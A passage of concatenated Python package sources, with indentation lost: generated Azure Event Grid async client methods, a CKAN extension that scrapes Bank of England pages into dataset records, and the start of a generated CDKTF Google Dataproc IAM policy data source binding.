polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
domain_name=domain_name,
topic_name=topic_name,
event_subscription_name=event_subscription_name,
api_version=api_version,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response): # pylint: disable=inconsistent-return-statements
if cls:
return cls(pipeline_response, None, {})
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_delete.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}"
}
async def _update_initial(
self,
resource_group_name: str,
domain_name: str,
topic_name: str,
event_subscription_name: str,
event_subscription_update_parameters: Union[_models.EventSubscriptionUpdateParameters, IO],
**kwargs: Any
) -> _models.EventSubscription:
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-06-15"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.EventSubscription] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(event_subscription_update_parameters, (IO, bytes)):
_content = event_subscription_update_parameters
else:
_json = self._serialize.body(event_subscription_update_parameters, "EventSubscriptionUpdateParameters")
request = build_update_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
topic_name=topic_name,
event_subscription_name=event_subscription_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self._update_initial.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("EventSubscription", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}"
}
@overload
async def begin_update(
self,
resource_group_name: str,
domain_name: str,
topic_name: str,
event_subscription_name: str,
event_subscription_update_parameters: _models.EventSubscriptionUpdateParameters,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.EventSubscription]:
"""Update a nested event subscription for a domain topic.
Update an existing event subscription for a domain topic.
:param resource_group_name: The name of the resource group within the user's subscription.
Required.
:type resource_group_name: str
:param domain_name: Name of the domain. Required.
:type domain_name: str
:param topic_name: Name of the topic. Required.
:type topic_name: str
:param event_subscription_name: Name of the event subscription to be updated. Required.
:type event_subscription_name: str
:param event_subscription_update_parameters: Updated event subscription information. Required.
:type event_subscription_update_parameters:
~azure.mgmt.eventgrid.models.EventSubscriptionUpdateParameters
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either EventSubscription or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.eventgrid.models.EventSubscription]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def begin_update(
self,
resource_group_name: str,
domain_name: str,
topic_name: str,
event_subscription_name: str,
event_subscription_update_parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> AsyncLROPoller[_models.EventSubscription]:
"""Update a nested event subscription for a domain topic.
Update an existing event subscription for a domain topic.
:param resource_group_name: The name of the resource group within the user's subscription.
Required.
:type resource_group_name: str
:param domain_name: Name of the domain. Required.
:type domain_name: str
:param topic_name: Name of the topic. Required.
:type topic_name: str
:param event_subscription_name: Name of the event subscription to be updated. Required.
:type event_subscription_name: str
:param event_subscription_update_parameters: Updated event subscription information. Required.
:type event_subscription_update_parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either EventSubscription or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.eventgrid.models.EventSubscription]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_update(
self,
resource_group_name: str,
domain_name: str,
topic_name: str,
event_subscription_name: str,
event_subscription_update_parameters: Union[_models.EventSubscriptionUpdateParameters, IO],
**kwargs: Any
) -> AsyncLROPoller[_models.EventSubscription]:
"""Update a nested event subscription for a domain topic.
Update an existing event subscription for a domain topic.
:param resource_group_name: The name of the resource group within the user's subscription.
Required.
:type resource_group_name: str
:param domain_name: Name of the domain. Required.
:type domain_name: str
:param topic_name: Name of the topic. Required.
:type topic_name: str
:param event_subscription_name: Name of the event subscription to be updated. Required.
:type event_subscription_name: str
:param event_subscription_update_parameters: Updated event subscription information. Is either
a model type or a IO type. Required.
:type event_subscription_update_parameters:
~azure.mgmt.eventgrid.models.EventSubscriptionUpdateParameters or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either EventSubscription or the result of
cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.eventgrid.models.EventSubscription]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-06-15"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.EventSubscription] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
domain_name=domain_name,
topic_name=topic_name,
event_subscription_name=event_subscription_name,
event_subscription_update_parameters=event_subscription_update_parameters,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("EventSubscription", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}"
}
@distributed_trace_async
async def get_full_url(
self, resource_group_name: str, domain_name: str, topic_name: str, event_subscription_name: str, **kwargs: Any
) -> _models.EventSubscriptionFullUrl:
"""Get full URL of a nested event subscription for domain topic.
Get the full endpoint URL for a nested event subscription for domain topic.
:param resource_group_name: The name of the resource group within the user's subscription.
Required.
:type resource_group_name: str
:param domain_name: Name of the top level domain. Required.
:type domain_name: str
:param topic_name: Name of the domain topic. Required.
:type topic_name: str
:param event_subscription_name: Name of the event subscription. Required.
:type event_subscription_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: EventSubscriptionFullUrl or the result of cls(response)
:rtype: ~azure.mgmt.eventgrid.models.EventSubscriptionFullUrl
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-06-15"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.EventSubscriptionFullUrl] = kwargs.pop("cls", None)
request = build_get_full_url_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
topic_name=topic_name,
event_subscription_name=event_subscription_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_full_url.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("EventSubscriptionFullUrl", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_full_url.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}/getFullUrl"
}
@distributed_trace
def list(
self,
resource_group_name: str,
domain_name: str,
topic_name: str,
filter: Optional[str] = None,
top: Optional[int] = None,
**kwargs: Any
) -> AsyncIterable["_models.EventSubscription"]:
"""List all nested event subscriptions for a specific domain topic.
List all event subscriptions that have been created for a specific domain topic.
:param resource_group_name: The name of the resource group within the user's subscription.
Required.
:type resource_group_name: str
:param domain_name: Name of the top level domain. Required.
:type domain_name: str
:param topic_name: Name of the domain topic. Required.
:type topic_name: str
:param filter: The query used to filter the search results using OData syntax. Filtering is
permitted on the 'name' property only and with limited number of OData operations. These
operations are: the 'contains' function as well as the following logical operations: not, and,
or, eq (for equal), and ne (for not equal). No arithmetic operations are supported. The
following is a valid filter example: $filter=contains(namE, 'PATTERN') and name ne 'PATTERN-1'.
The following is not a valid filter example: $filter=location eq 'westus'. Default value is
None.
:type filter: str
:param top: The number of results to return per page for the list operation. Valid range for
top parameter is 1 to 100. If not specified, the default number of results to be returned is 20
items per page. Default value is None.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either EventSubscription or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.eventgrid.models.EventSubscription]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-06-15"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.EventSubscriptionsListResult] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
topic_name=topic_name,
subscription_id=self._config.subscription_id,
filter=filter,
top=top,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("EventSubscriptionsListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
list.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions"
}
@distributed_trace_async
async def get_delivery_attributes(
self, resource_group_name: str, domain_name: str, topic_name: str, event_subscription_name: str, **kwargs: Any
) -> _models.DeliveryAttributeListResult:
"""Get delivery attributes for an event subscription for domain topic.
Get all delivery attributes for an event subscription for domain topic.
:param resource_group_name: The name of the resource group within the user's subscription.
Required.
:type resource_group_name: str
:param domain_name: Name of the top level domain. Required.
:type domain_name: str
:param topic_name: Name of the domain topic. Required.
:type topic_name: str
:param event_subscription_name: Name of the event subscription. Required.
:type event_subscription_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DeliveryAttributeListResult or the result of cls(response)
:rtype: ~azure.mgmt.eventgrid.models.DeliveryAttributeListResult
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-06-15"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.DeliveryAttributeListResult] = kwargs.pop("cls", None)
request = build_get_delivery_attributes_request(
resource_group_name=resource_group_name,
domain_name=domain_name,
topic_name=topic_name,
event_subscription_name=event_subscription_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get_delivery_attributes.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("DeliveryAttributeListResult", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_delivery_attributes.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/domains/{domainName}/topics/{topicName}/eventSubscriptions/{eventSubscriptionName}/getDeliveryAttributes"
}
|
PypiClean
|
/ckanext_boe-0.0.2-py3-none-any.whl/ckanext/boe/utils/scrap.py
|
from __future__ import annotations
import mimetypes
import logging
import tempfile
from typing import Any, Iterable, Optional
import enum
import uuid
import requests
from pathlib import Path
from pathlib import Path
from urllib.parse import urlparse, parse_qs, urlencode, parse_qsl
from markdownify import markdownify
from bs4 import BeautifulSoup
log = logging.getLogger(__name__)
tmp_root = Path(tempfile.gettempdir())
cache = tmp_root / "ckanext-pages"
proxies = dict(http='socks5://127.0.0.1:2001', https='socks5://127.0.0.1:2001')
if not cache.exists():
log.debug("Create cache folder at %s", cache)
cache.mkdir()
URL = urlparse("https://www.bankofengland.co.uk")
def download_into(url: str, dest: Path, params: dict[str, str], use_proxy: bool = False):
resp = requests.get(url, stream=True, proxies=proxies if use_proxy else {}, params=params, headers={"user-agent": "python"})
resp.raise_for_status()
with dest.open("wb") as fp:
for chunk in resp.iter_content(1024):
fp.write(chunk)
def dig(root: str):
parsed = urlparse(root)
path = parsed.path
params = parse_qsl(parsed.query)
url = URL._replace(path=path).geturl()
page = get_page(url, dict(params))
if page.visited:
return
page.visit()
yield page
if page.type.is_(PageType.section):
for link in page.sub_links():
yield from dig(link)
def get_page(url: str, params: dict[str, str], use_proxy: bool = False):
key = str([url, list(sorted(params.items()))])
key = str(uuid.uuid3(uuid.NAMESPACE_URL, key))
source = cache / key
old = Page.lookup(source)
if old:
log.debug("Re-visiting %s", url)
return old
if not source.exists():
log.debug("Create cache %s for %s", key, url)
download_into(url, source, params, use_proxy)
else:
log.debug("Load cache %s for %s", key, url)
return Page(source, url)
class PageType(enum.Flag):
page = enum.auto()
section = enum.auto()
package = enum.auto()
resource = enum.auto()
def is_(self, type: PageType):
return self & type
class Page:
__cache = {}
visited = False
@classmethod
def lookup(cls, source: Path):
if source in cls.__cache:
return cls.__cache[source]
def __init__(self, source: Path, url: str):
self.url = url
with source.open("rb") as fp:
self.dom = BeautifulSoup(fp)
self.__cache[source] = self
def visit(self):
self.visited = True
@property
def type(self) -> PageType:
type = PageType.page
if self.has_sub_links():
type |= PageType.section
if self.has_package_data():
type |= PageType.package
return type
def has_sub_links(self):
return len(self.dom.select(".sub-links .sub-links-link")) > 0
def sub_links(self) -> dict[str, str]:
return {
str(link["href"]): link.text
for link in self.dom.select(".sub-links .sub-links-link")
}
def has_package_data(self) -> bool:
# TODO: implement
return bool(self.package_data())
def package_data(self) -> Iterable[dict[str, Any]]:
content = self.dom.select(".page-section .content-block")
for block in content:
data = self._block_to_dataset(block)
if data:
yield data
def _block_to_dataset(self, block) -> Optional[dict[str, Any]]:
import ckan.lib.munge as munge
h2 = block.h2
if not h2:
return
resources = self._resources_from_block(block)
for media_block in self.dom.select(".page-section .content-block"):
if block == media_block:
continue
resources.extend(self._media_resources_from_block(media_block))
data = {
"title": self.dom.body.h1.text + " - " + h2.text,
"notes": markdownify("".join(map(str, block.select("h2 ~ p")))),
"url": self.url,
"resources": resources,
}
data["name"] = munge.munge_title_to_name(data["title"])
return data
def _media_resources_from_block(self, block):
links = [a for a in block.select('a[href*="/media/"]')]
resources = []
for link in links:
resource = self._link_into_resource(link)
resource["description"] = markdownify(str(block))
resources.append(resource)
return resources
def _resources_from_block(self, block):
links = [a for a in block.select(f'a[href^="{URL.geturl()}"]')]
resources = []
for link in links:
resource = self._link_into_resource(link)
resources.append(resource)
url = urlparse(resource["url"])
if url.path.startswith("/boeapps/database"):
qs = parse_qs(url.query)
if "html.x" in qs:
qs["csv.x"] = qs.pop("html.x")
qs["CSVF"] = ["CN"]
resources.append(
{
"name": resource["name"],
"url": url._replace(
scheme=URL.scheme,
netloc=URL.netloc,
path=url.path.replace("/database/", "/iadb/"),
query=urlencode(qs, True),
).geturl(),
"format": "CSV",
}
)
return resources
def _link_into_resource(self, link):
import ckan.plugins.toolkit as tk
href = link["href"]
assert isinstance(href, str)
url = urlparse(href)
mime, _enc = mimetypes.guess_type(url.path)
if mime:
fmt = tk.h.unified_resource_format(mime)
else:
if url.path.endswith(".asp"):
fmt = "URL"
else:
fmt = tk.h.unified_resource_format("application/octet-stream")
return {
"name": link.text,
"url": url._replace(scheme=URL.scheme, netloc=URL.netloc).geturl(),
"format": fmt,
}
|
PypiClean
|
/cdktf-cdktf-provider-google_beta-9.0.1.tar.gz/cdktf-cdktf-provider-google_beta-9.0.1/src/cdktf_cdktf_provider_google_beta/data_google_dataproc_cluster_iam_policy/__init__.py
|
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
from typeguard import check_type
from .._jsii import *
import cdktf as _cdktf_9a9027ec
import constructs as _constructs_77d1e7e8
class DataGoogleDataprocClusterIamPolicy(
_cdktf_9a9027ec.TerraformDataSource,
metaclass=jsii.JSIIMeta,
jsii_type="@cdktf/provider-google-beta.dataGoogleDataprocClusterIamPolicy.DataGoogleDataprocClusterIamPolicy",
):
'''Represents a {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy google_dataproc_cluster_iam_policy}.'''
def __init__(
self,
scope: _constructs_77d1e7e8.Construct,
id_: builtins.str,
*,
cluster: builtins.str,
id: typing.Optional[builtins.str] = None,
project: typing.Optional[builtins.str] = None,
region: typing.Optional[builtins.str] = None,
connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
) -> None:
'''Create a new {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy google_dataproc_cluster_iam_policy} Data Source.
:param scope: The scope in which to define this construct.
:param id_: The scoped construct ID. Must be unique amongst siblings in the same scope
:param cluster: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#cluster DataGoogleDataprocClusterIamPolicy#cluster}.
:param id: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#id DataGoogleDataprocClusterIamPolicy#id}. Please be aware that the id field is automatically added to all resources in Terraform providers using a Terraform provider SDK version below 2. If you experience problems setting this value it might not be settable. Please take a look at the provider documentation to ensure it should be settable.
:param project: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#project DataGoogleDataprocClusterIamPolicy#project}.
:param region: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#region DataGoogleDataprocClusterIamPolicy#region}.
:param connection:
:param count:
:param depends_on:
:param for_each:
:param lifecycle:
:param provider:
:param provisioners:
'''
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__cbdfc1f5a161228c95adde0ef989c835403cd8a2a6d7d35d4a6f667c9742957c)
check_type(argname="argument scope", value=scope, expected_type=type_hints["scope"])
check_type(argname="argument id_", value=id_, expected_type=type_hints["id_"])
config = DataGoogleDataprocClusterIamPolicyConfig(
cluster=cluster,
id=id,
project=project,
region=region,
connection=connection,
count=count,
depends_on=depends_on,
for_each=for_each,
lifecycle=lifecycle,
provider=provider,
provisioners=provisioners,
)
jsii.create(self.__class__, self, [scope, id_, config])
@jsii.member(jsii_name="resetId")
def reset_id(self) -> None:
return typing.cast(None, jsii.invoke(self, "resetId", []))
@jsii.member(jsii_name="resetProject")
def reset_project(self) -> None:
return typing.cast(None, jsii.invoke(self, "resetProject", []))
@jsii.member(jsii_name="resetRegion")
def reset_region(self) -> None:
return typing.cast(None, jsii.invoke(self, "resetRegion", []))
@jsii.member(jsii_name="synthesizeAttributes")
def _synthesize_attributes(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "synthesizeAttributes", []))
@jsii.python.classproperty
@jsii.member(jsii_name="tfResourceType")
def TF_RESOURCE_TYPE(cls) -> builtins.str:
return typing.cast(builtins.str, jsii.sget(cls, "tfResourceType"))
@builtins.property
@jsii.member(jsii_name="etag")
def etag(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "etag"))
@builtins.property
@jsii.member(jsii_name="policyData")
def policy_data(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "policyData"))
@builtins.property
@jsii.member(jsii_name="clusterInput")
def cluster_input(self) -> typing.Optional[builtins.str]:
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "clusterInput"))
@builtins.property
@jsii.member(jsii_name="idInput")
def id_input(self) -> typing.Optional[builtins.str]:
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "idInput"))
@builtins.property
@jsii.member(jsii_name="projectInput")
def project_input(self) -> typing.Optional[builtins.str]:
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "projectInput"))
@builtins.property
@jsii.member(jsii_name="regionInput")
def region_input(self) -> typing.Optional[builtins.str]:
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "regionInput"))
@builtins.property
@jsii.member(jsii_name="cluster")
def cluster(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "cluster"))
@cluster.setter
def cluster(self, value: builtins.str) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__67280ce663d29e99ee680c97ad49e21873bf5297e614bbfa1d689f303ab2d9de)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "cluster", value)
@builtins.property
@jsii.member(jsii_name="id")
def id(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "id"))
@id.setter
def id(self, value: builtins.str) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__0266c902d95c3d72fa1317421c12f5cf1bc00a01fa73ed24a7a26b9e996392d3)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "id", value)
@builtins.property
@jsii.member(jsii_name="project")
def project(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "project"))
@project.setter
def project(self, value: builtins.str) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__1312e1730d0d6933657866c713a1fdd67708e8ba1b651ff6dfaaef802b69b03f)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "project", value)
@builtins.property
@jsii.member(jsii_name="region")
def region(self) -> builtins.str:
return typing.cast(builtins.str, jsii.get(self, "region"))
@region.setter
def region(self, value: builtins.str) -> None:
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__63425cc9344a331ec9c0bbbc56dde35d3e72dd90dff0cb50fc7fa47f4baef589)
check_type(argname="argument value", value=value, expected_type=type_hints["value"])
jsii.set(self, "region", value)
@jsii.data_type(
jsii_type="@cdktf/provider-google-beta.dataGoogleDataprocClusterIamPolicy.DataGoogleDataprocClusterIamPolicyConfig",
jsii_struct_bases=[_cdktf_9a9027ec.TerraformMetaArguments],
name_mapping={
"connection": "connection",
"count": "count",
"depends_on": "dependsOn",
"for_each": "forEach",
"lifecycle": "lifecycle",
"provider": "provider",
"provisioners": "provisioners",
"cluster": "cluster",
"id": "id",
"project": "project",
"region": "region",
},
)
class DataGoogleDataprocClusterIamPolicyConfig(_cdktf_9a9027ec.TerraformMetaArguments):
def __init__(
self,
*,
connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
